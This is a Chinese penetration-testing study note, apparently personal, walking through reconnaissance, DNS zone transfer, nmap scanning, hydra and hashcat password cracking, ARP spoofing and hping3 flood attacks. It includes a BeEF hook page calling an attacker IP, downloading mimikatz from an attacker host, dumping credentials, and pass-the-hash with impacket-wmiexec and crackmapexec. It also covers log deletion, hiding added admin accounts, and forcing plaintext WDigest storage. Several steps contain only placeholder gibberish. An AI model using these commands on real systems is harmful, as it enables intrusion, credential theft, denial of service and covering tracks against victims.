被动信息收集

代理与vpn不同

mitmproxy

whois  域名

whois baidu.com

┌──(root㉿kali)-[~/桌面/6565]
└─# whois baidu.com
   Domain Name: BAIDU.COM
   Registry Domain ID: 11181110_DOMAIN_COM-VRSN
   Registrar WHOIS Server: whois.markmonitor.com
   Registrar URL: http://www.markmonitor.com
   Updated Date: 2022-09-01T03:54:43Z
   Creation Date: 1999-10-11T11:05:17Z
   Registry Expiry Date: 2026-10-11T11:05:17Z
   Registrar: MarkMonitor Inc.
   Registrar IANA ID: 292
   Registrar Abuse Contact Email: abusecomplaints@markmonitor.com
   Registrar Abuse Contact Phone: +1.2086851750

Domain Name: baidu.com
Registry Domain ID: 11181110_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.markmonitor.com
Registrar URL: http://www.markmonitor.com
Updated Date: 2022-09-01T03:29:31+0000
Creation Date: 1999-10-11T11:05:17+0000
Registrar Registration Expiration Date: 2026-10-11T07:00:00+0000
Registrar: MarkMonitor, Inc.
Registrar IANA ID: 292
Registrar Abuse Contact Email: abusecomplaints@markmonitor.com
Registrar Abuse Contact Phone: +1.2086851750

Tech Email: Select Request Email Form at https://domains.markmonitor.com/whois/baidu.com
Name Server: ns1.baidu.com
Name Server: ns4.baidu.com
Name Server: ns3.baidu.com
Name Server: ns2.baidu.com
Name Server: ns7.baidu.com

whois.chinaz.com

在平台上查的域名隐私信息可能会被打码

可以直接在kali使用whois命令进行查询，这样不会打码

Google Hacking

搜索引擎就是爬边全世界，然后把爬取的数据存到他的数据库。

你可以去google的库里查看。

site:域名（只在这个域名进行收拾，限定搜索范围）

html 他有个标题，就是intitle

intitle:index.of.etc

谁便打开

换一个

wp-config.php.bak。。。。。

inurl:index.php.bak

在url里搜索目录下的index.php.bak

还能搜索网络上的摄像头

主动信息收集

DNS 解析域名

解析邮件服务器

有很多站的请求是先请求到云WAF,

直接解析邮件服务器或者其他的服务器可能直接找到他的真实ip,

先找到他邮件服务器的ip，然后他web站的服务器ip很可能就在同一网断内，

可能就直接找到了他web站的真实ip,

子域名爆破

amass

在多个服务器上要做dns同步

用的是tcp dns 53端口，如果有配置不当，可能有机会axfr攻击

axfr攻击

dnsrecon 

dnsrecon -d megacorpone.com -t axfr

Trying NS server 51.222.39.63       就是这台有问题，
[+] 51.222.39.63 Has port 53 TCP Open    53端口 TCP 是开启的
[+] Zone Transfer was successful!!     突破了

底下就是这家公司的所有域名服务器

有了域名，就可以解析出ip,有了ip就可以进行端口扫描了。

nmap

–min-rate 10000是扫描速率1万的速率

-p-是全端口什么

-sC -sV -O

-sC——同时使用默认脚本扫描

-sV——进行版本探测

-O——对目标操作系统进行探测

-p加端口，直接对端口开放的服务进行弱点扫描

nmap 自带的script

nmap还可以使用自带的script 去扫描漏洞

–script 服务类型

smb smtp pop nfs samba snmp 这些都是容易出现漏洞的服务

平均一个IP全端口扫描会产生4MB的流量，如果对一个段256个主机进行扫描，

4MBX256个主机=1024MB，就是一个G的流量，这样很容易被一些设备发现，

短时间内一个ip产生了1G的流量。

nmap 拓展命令

扫描单个主机上的所有TCP端口：
nmap -sS <主机IP>
扫描单个主机上的所有UDP端口：
nmap -sU <主机IP>
扫描单个主机上的特定端口：
nmap -p <端口号> <主机IP>
扫描整个网络中的所有主机，探测开放的TCP端口：
nmap -sS <网络地址>/24
扫描整个网络中的所有主机，探测开放的UDP端口：
nmap -sU <网络地址>/24
扫描整个网络中的所有主机，探测操作系统类型：
nmap -O <网络地址>/24
扫描整个网络中的所有主机，探测操作系统类型和版本：
nmap -A <网络地址>/24
使用TCP连接扫描模式进行端口扫描：
nmap -sT <主机IP>
使用TCP SYN扫描模式进行端口扫描，同时显示详细输出：
nmap -sS -v <主机IP>
将扫描结果保存到文件中：
nmap -oN <文件名> <主机IP>
扫描一个主机的所有TCP端口，同时显示服务和版本信息：
nmap -sV <主机IP>
扫描一个主机的所有TCP端口，同时使用操作系统检测和版本检测：
nmap -O -sV <主机IP>
扫描一个主机的所有TCP端口，同时使用默认脚本扫描，脚本在Nmap的安装目录下的scripts目录中：
nmap -sC <主机IP>
扫描一个主机的所有TCP端口，同时使用所有脚本扫描：
nmap -sC -sV --script=all <主机IP>
扫描一个主机的所有TCP端口，同时使用脚本扫描并输出为XML格式：
nmap -sC -sV -oX <文件名>.xml <主机IP>
扫描一个主机的TCP端口1-1024，同时使用默认脚本扫描和操作系统检测：
nmap -sC -O -p1-1024 <主机IP>
扫描一个主机的所有UDP端口，同时使用默认脚本扫描：
nmap -sU -sC <主机IP>
扫描一个主机的TCP端口1-1000，同时使用SYN扫描模式和操作系统检测：
nmap -sS -O -p1-1000 <主机IP>

还有另一个

masscan

全端口扫描

PHP站点渗透过程

1、测试注入点是否存在

arp-scam -l  

首先在同一网段内，进行二层扫描，

拿到ip地址后就可以对其进行各种尝试了~

首先进行全端口的扫描

在对其开放的端口进行详细探测， 
-sV同时使用操作系统检测和版本检测 
-A探测操作系统类型和版本

在扫描的同时，因为它开放了80端口，可以访问一下他的web站点在网站上找找突破点

对其网站目录进行扫描

dirb 对网站路径扫描

通过扫描发现其各种配置文件路径和后台，各种信息，然后就可以看看有木有有价值的。

》》》

然后另外就是看看另外的方向，ssh,mysql,9090

2、sqlmap跑数据库和表名

1

1

3、dump表数据

1

1

4、破解加密的密码

在线暴力破解
hydra

hydra  -l  w_w  -P  /usr/share/wordlists/nmap.lst  ssh://192.168.100.100

Examples:
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh

hydra

-l是指定用户名  -L是用户名字典

-p是密码  -P是密码字典

离线暴力破解

john

hashcat、crunch、hydra、cewl、cupp

kali /wordlists目录下提供了很多种类的字典，有些是爆破目录的，有些是爆破用户名密码，都是差不多专项的。

存暴力破解是不存在的，只能是基于字典，

在知道对方密码大概范围的情况下，

密码长度，大小写，数字符号等等，就可以构造一个字典

crunch 构造字典

crunch 5 5 -t @@@%%   
min = 5 max = 5最大长度5最小长度5， @@@三个小写字母，%%两个数字

各种字典
      /usr/share/Seclist  (wordlists)
自定义字典
crunch <min> <max> <charset> [options]
字符集/usr/share/crunch/charset.lst

crunch 5 5-t @@@%%
@:小写字母
,:大写字母
%:数字
^:符号

cewl 

cewl -u ua -e -H <URL> -w dict.txt

是针对一个站点的所有字符进行爬取成密码字典，然后进行爆破，成功率会高很多。

hashcat

hashid -e -m -j <hash>  ##加盐、hashcat、 john编号

hashcat [options] hash | hashfile  [dictmask directory]
-m hash算法类型   -a 攻击类型(a0:单个字典、a1:a3是根据密码规则)
掩码?l、?u、?d、?s、?a
hashcat  -m100 -a3 hash -i  –increment-min 3  –increment-max 8 ?l?l?l?l?l?l?l?l

Hashcat 常用选顶参数

-a                                / / 指定破解模式
-m                                / / 指定Hash类型（ 默认MD5 ）
-o                                / / 将输出结果储存到指定的文件
--force                            / / 忽略警告信息
--show                        / / 仅显示已经破解的Hash及其对应的明文（近期破解的存放在hashcat.potfile文件中）
--incremen                  / / 启用增量破解模式， 可以利用此模式让Hashcat 在指定的密码长度范围内执行破解过程
--increment-min           / / 密码最小长度， 配合increment模式一起使用
--increment-max           / / 密码最大长度， 同上
--outfile-format                 / / 指定破解结果的输出格式id ， 默认是3
--username                 / / 忽略hash 文件中的指定的用户名， 在破解linux系统用户密码hash可能会用到
--remove                        / / 删除已被破解成功的hash
-r                                 / / 使用自定义破解规则

Hashcat 的破解模式（ 用 -a 选顶指定）
-a  0         Straight （ 字典破解）
-a  1         Combination （ 组合破解）
-a  3         Brute-force （ 掩码暴力破解）
-a  6         Hybrid Wordlist + Mask （ 字典+掩码破解）
-a  7         Hybrid Mask + WordIist （ 掩码+字典破解）

Hashcat 的Hash 类型（ 用 -m 选项指定）
-m 900                 MD4
-m 0                    MD5
-m 100                SHAI
-m 1300             SHA2-224
-m 1400              SHA2-256
-m 10800             SHA2-384
-m 1700              SHA2-512
-m 10                 MD5($pass.$salt)
-m 20                 MD5($salt.$pass)
-m 3800              MD5($saIt.$pass.$salt)
-m 3000               LM
-m 1000               NTLM

Hashcat 的掩码字符集
?l                小写字母(abcdefghijklmnopqrstuvwxyz)
?u                大写字母(ABCDEFGHIJKLMNOPQRSTUVWXYZ)
?d                十进制数字（ 0123456789 ）
?h                十六进制数字， 字母小写（ 0123456789abcdef ）
?H                十六进制数字， 字母大写（ 0123456789ABCDEF ）
?s                特殊字符（! " # $ % & ' () * + , - / . : ;< = > ? @ [ \ ] ^ _ { | } ~ ）
?a                相当于?l ?u ?d ?s，即键盘上所有可见的字符
?b                0x00 - 0xff

Hashcat 掩码运用实例
八位数字密码： ?d?d?d?d?d?d?d?d
八位未知密码：?a?a?a?a?a?a?a?a
前四位为大写字母， 后四位为数字： ?u?u?u?u?d?d?d?d
前三个字符未知， 中间为admin, 后三位未知：?a?a?aadmin?a?a?a
6-8 位数字密码：--increment --increment-min 6 --increment-max 8
6-8 位数字+小写字母密码：--increment --increment-min 6 --increment-max 8 ?h?h?h?h?h?h?h?h

使用单个字典对一个经过MD5算法运算过后的Hash值进行破解：

hashcat -a 0 -m 0 e10adC3949ba59abbe56e057f20f883e /usr/password.txt

使用2个字典对一个经过SHA1算法运算过后的Hash值进行破解：

hashcat -a 1 -m 100 7Ce0359f12857f2a90C7de465f40a95f01Cb5da9 /usr/p1.txt /usr/p2.txt

如果不知道哈希的类型可以通过hashid来识别

5、利用nikto扫描隐藏目录

1

dadsssada

6、查找管理后台

sad

hkj

7、利用漏洞提升用户管理权限

Dsada

sdasdA

asdad

中间人攻击之ARP欺骗

ARP欺骗是针对以太网地址解析协议(ARP)的一种攻击技术，通过欺骗局域网内访问者PC的网关MAC地址，使访问者PC错以为攻击者更改后的MAC地址是网关的MAC，导致网络不通。此种攻击可让攻击者获取局域网上的数据包甚至可篡改数据包，且可让网上上特定计算机或所有计算机无法正常连线。

相关工具:

ettercap、arpspoof

ip neigh

echo 1 > /proc/sys/net/ipv4/ip_forward

arpspoof -i eth0 -t <ip1> -r <ip2>

ettercap

0.8.3.1 版本

选择使用的网卡，开启

先扫描一下网段

一台win，地址：192.168.100.128

一台centos8,地址：192.168.100.100

选着要欺骗的目标，接下来就是在他们俩直接做arp欺骗

然后客户机去登录服务器的登录密码就会被抓取到了。

还有一个版本是 0.8.2 的

选择网卡

扫描局域网内所有主机

扫描完后的，主机列表

开启ARP欺骗

然后客户机去登录服务器的登录密码就会被抓取到了。

DOS工具之hping3

hping是面向命令行的用于生成和解析TCP/IP协议数据包汇编/分析的开源工具。

目前最新版是hping3，它支持TCP，UDP，ICMP和RAW-IP协议，
具有跟踪路由模式，能够在覆盖的信道之间发送文件以及许多其他功能，
支持使用tcl脚本自动化地调用其API。

hping是安全审计、防火墙测试等工作的标配工具优势在于能够定制数据包的各个部分，
因此用户可以灵活对目标机进行细致地探测。

LandAttack(源目的地址相同)
hping3 -S -c 100 -a <sip> -p 22 <dip>

DOS攻击
hping3 -S -d 100 -w 64 -p 445 -s 445 --flood --rand-source <lP>

Smurf攻击
hping3 -1 --flood -a <dip> 1.1.1.255

扫描地址掩码
hping3 -1 -c 1 -V -C 17 <dip>

端口扫描
hping3 -c 1 -V -p 80 -s 5050 -<SFXYARPU> <dip>
sudo hping3 -8 1-1000 -S 172.31.1.30

XSS利器之BeEF

BeEF(The Browser Exploitation Framework)是由Wade  Alcorn在2006年开始创建的，至今还在维护。是由ruby语言开发的专门针对浏览器攻击的框架

利用XSS漏洞，BeEF可以通过预先设定好的JavaScript控制目标主机的浏览器，通过浏览器拿到各种信息并扫描内网信息，同时能够配合metasploit进一步渗透主机.

apt install beef-xss

启动 beef(配置文件/etc/beef-xss/config.yaml)
vi /var/www/html/a.html
<html>
<head>
<script src=http://10.1.8.132:3000/hookjs’></script>
</head>
<body> Hello World </body>
</html>
结合XSS漏洞发起攻击社工钓鱼、cookie

beef忘记密码情况下，修改密码

┌──(root㉿kali)-[~]
 cd /usr/share/beef-xss

vim config.yaml

beef:
version: 0.5.4.0

credentials:
user: “beef”
passwd: “123”   这里就是账号密码

然后重启beef

systemctl restart beef-xss.service

访问管理地址http://127.0.0.1:3000/ui/panel

复制这段代
码

选一个站点进行测试，这里的ip要填kali的地址

这样就在beef里上线了

这里有很多功能可以慢慢尝试

Link Rewrite 链接重写

接下来任何链接都被修改了

还有社交类的，做钓鱼

CVSS (Common Vulnerability Scoring System)

CVSS是安全内容自动化协议 (SCAP)的一部分
通常CVSS与CVE一同由美国国家漏洞库(NVD)发布并保持数据的更新
分值范围:0–10
不同机构按CVSS分值定义威胁的中、高、低威胁级别
CVSS体现弱点的风险，威胁级别 (severity) 表示弱点风险对企业的影响程度
CVSS分值是工业标准，但威胁级别不是

Vulnerability Reference

CVE ( Common Vulnerabilities and Exposures )

已公开的信息安全漏洞字典，统一的漏洞编号标准
MITRE公司负责维护(非盈利机构）
扫描器的大部分扫描项都对应一个CVE编号
实现不同厂商之间信息交换的统一标准

很多厂商维护自己的Vulnerability Reference
MS    微软的

MSKB  

其他Vulnerability Reference
CERT TA08-297A
BID 31874
IAVM 2008-A-0081
OVAL OVAL6093

OVAL (Open Vulnerability and Assessment Language)

描述漏洞检测方法的机器可识别语言
详细的描述漏洞检测的技术细节，
可导入自动化检测工具中实施漏洞检测工作
OVAL使用XML语言描述，包含了严密的语法逻辑

CCE

描述软件配置缺陷的一种标准化格式
在信息安全风险评估中，配置缺陷的检测是一项重要内容，
使用CCE可以让配置缺陷以标准的方式展现出来，便于配置缺陷评估的可量化操作。

CPE (Common Product Enumeration)

信息技术产品、系统、软件包的结构化命名规范，分类命名

CWE (Common Weakness Enumeration)

常见漏洞类型的字典，描述不同类型漏洞的特征(访问控制、信息泄露、拒绝服务)

Security Content Automation Protocol  (SCAP)

SCAP是一个集合了多种安全标准框架

六个元素:CVE、OVAL、CCE、CPE、CVSS、XCCDF

目的是以标准的方法展示和操作安全数据
由NIST负责维护

NVD (National Vulnerability Database)

美国政府的漏洞管理标准数据
完全基于SCAP框架
实现自动化漏洞管理、安全测量、合规要求
官网:https://nvd.nist.gov

================================================

================================================

Windows身份认证过程

mimikatz

详细的操作方法在这个文章 Mimikatz详细使用总结

在目标机器上下载 mimikatz

cmd 中启用 powershell 

wget http://192.168.100.111/mimikatz.exe

./mimikatz.exe

::

standard：  标准模块，基本命令
crypto：    加密相关模块
sekurlsa：  与证书相关的模块
kerberos：  kerberos模块
privilege： 提权相关模块
process：   进程相关模块
serivce：   服务相关模块
lsadump：   LsaDump模块
ts：        终端服务器模块
event：     事件模块
misc：      杂项模块
token：     令牌操作模块
vault：     Windows 、证书模块
minesweeper：Mine Sweeper模块
net：
dpapi：     DPAPI模块（通过API或RAW访问）[数据保护应用程序编程接口]
busylight： BusyLight Module
sysenv：    系统环境值模块
sid：       安全标识符模块
iis：       IIS XML配置模块
rpc：       mimikatz的RPC控制
sr98：      用于SR98设备和T5577目标的RF模块
rdm：       RDM（830AL）器件的射频模块
acr：       ACR模块
version：   查看版本
exit：      退出

提升为debug权限

privilege::id [number]

调整id来调整权限 20是dubug; 10是driver

Privilege::debug：请求调试权限。
Privilege::driver：请求装载驱动权限。
Privilege::security：请求安全权限。
Privilege::tcb：请求 tcb 权限。
Privilege::backup：请求 backup 权限。
Privilege::restore：请求恢复权限。
Privilege::sysenv：请求系统环境权限。
Privilege::id：请求 id 特权，参数后跟具体的 id 值，例如请求特权 8：privilege：：id 8。
Privilege::name：请求指定名称的权限。

sekurlsa模块（提取用户凭证功能）

sekurlsa::

msv  -  获取 LM & NTLM 凭证，可以获取明文密码。
       wdigest  -  获取 WDigest 凭证，可以获取明文密码
      kerberos  -  获取 Kerberos 凭证。
         tspkg  -  获取 TsPkg 凭证。
       livessp  -  获取LiveSSP 凭证。
           ssp  -  获取凭证。
logonPasswords  -  获登录用户信息及密码，如果是在系统权限或者 psexec 进入的系统权限下，直接使用该命令，而无需运行 privilege::debug，否则需要运行该命令。
       process  -  切换或者恢复到 lsass 初始状态。
      minidump  -  切换或者恢复到 minidump 初始状态。
           pth  -  Pass-the-hash
        krbtgt  -  krbtgt!
   dpapisystem  -  显示DPAPI_SYSTEM密码值。
         trust  -  显示 Kerberos 票据。
    backupkeys  -  首选备份主密钥
       tickets  -  列出Kerberos票据
         ekeys  -  显示 Kerberos 加密密钥。
         dpapi  -  显示内存中的 MasterKeys
       credman  -  显示管理员凭证。

sekurlsa::logonPasswords 提取所有密码

sekurlsa::wdigest

通过可逆方式 提取用户密码明文

sekurlsa::kerberos

抓取kerberos的明文密码

通过NTLM登录复现

在目标机器上获取NTLM, 如果没法复制可以用 http传输

如果没法复制可以用 http传输,

这里的地址填kali的，后加要传输的内容

 

KALI端接收

拿到这个密文后可以破解，也可以直接用

接下来就可以直接登录了，哈哈哈~

impacket-wmiexec

impacket-wmiexec -hashes 00000000000000000000000000000000:ae74afe74b7c6c328c901bf54a704396 Administrator@192.168.100.101

-hashes 后面是32个占位符，再接NTLM，user name名字,@接目标机器ip

 

另外一个工具

crackmapexec

crackmapexec smb 192.168.100.101 -u Administrator -H ae74afe74b7c6c328c901bf54a704396 –sam

也可以执行命令

详细的操作方法在这个文章 Mimikatz详细使用总结

接下来就是提权了

 

ADMIN提权为SYSTEM
注入进程提权
     隐藏痕迹
     pinjector.exe
抓包嗅探
Windows:
wireshark、omnipeek、commview、sniffpass

Linux: Tcpdump、Wireshark、Dsniff
键盘记录
      Keylogger、木马窃取
漏洞提权
配置不当提权

 

Linux

/etc/resolv.conf
/etc/passwd
/etc/shadow
whoami and who -a
ip -a, iptables -L -n, ifconfig -a, netstat -r
uname -a,ps aux
dpkg -l | head

 

Windows

ipconfig /all , ipconfig /displaydns, netstat -bnao , netstat -r
net view , net view /domain
net user/domain, net user %username% /domain
net accounts, net share
net localgroup administrators username /add
net group “Domain Controllers” /domainnet share name$=c:\/unlimited
net user username /active:yes /domain

 

商业信息系统信息

Linux

etc;
/usr/local/etc
/etc/password;
/etc/shadow
.ssh;
·gnupg公私钥
Thre e-mail and data files
业务数据库;身份认证服务器数据库
/tmp

 

Windwos

SAM数据库;注册表文件
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
业务数据库;身份认证数据库
临时文件目录
UserProfile\AppData\Local\Microsoft\Windows\Temporary Internet Files\

 

隐藏痕迹

禁止在登录界面显示新建账号
REG ADD
“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\WinLogon\SpecialAccounts\UserList” /vuname /T REG_DWORD /D 0
del %WINDIR%\*.log /a/s/q/f
History
日志
auth.log/secure
btmp/wtmp
lastlog/faillog
其他日志和HIDS等

/usr/share/windows-resources/mimikatz/

系统登录后将身份认证信息存于lsass进程内存中
vista之后系统不存LM,Win8.1之后内存中无HASH / 明文密码
reg add
HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\wDigest /v UseLogonCredential /t REG_DWORD /d 1
privilege:debug
sekurlsa:logonpasswords
process:runp
#以SYSTEM权限运行